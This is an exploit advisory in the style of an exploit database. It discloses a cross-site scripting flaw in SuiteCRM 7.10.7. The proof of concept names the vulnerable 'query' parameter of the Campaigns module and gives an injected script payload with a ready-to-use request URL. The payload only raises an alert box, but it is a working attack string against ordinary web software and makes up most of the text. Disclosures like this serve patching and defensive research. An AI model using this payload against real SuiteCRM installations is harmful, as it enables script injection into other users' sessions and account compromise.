####################################################################
# Exploit Title: SuiteCRM 7.10.7 - XSS Vulnerabilities
# Dork: N/A
# Date: 03-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://suitecrm.com/download/
# Version: 7.10.7
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: SuiteCRM was awarded the 2015 BOSSIE by InfoWorld
as the world's best open source Customer Relationship Management (CRM) application.
####################################################################
# Vulnerabilities
# This web application called as SuiteCRM 7.10.7 version.
# You can see the vulnerability by using the XSS code as specified in the poc section.
####################################################################
# POC - XSS
# Parameters : query
# Attack Pattern : ;%0d%0aalert(3488709);//>
# POST Request : http://localhost/[PATH]/index.php?mu=false&module=Campaigns&action=index&parentTab=All&orderBy=&sortOrder=&name_basic=uatuguvg¤t_user_only_basic=0&button=Search&searchFormTab=basic_search&query=true;%0d%0aalert(3488709);//>
####################################################################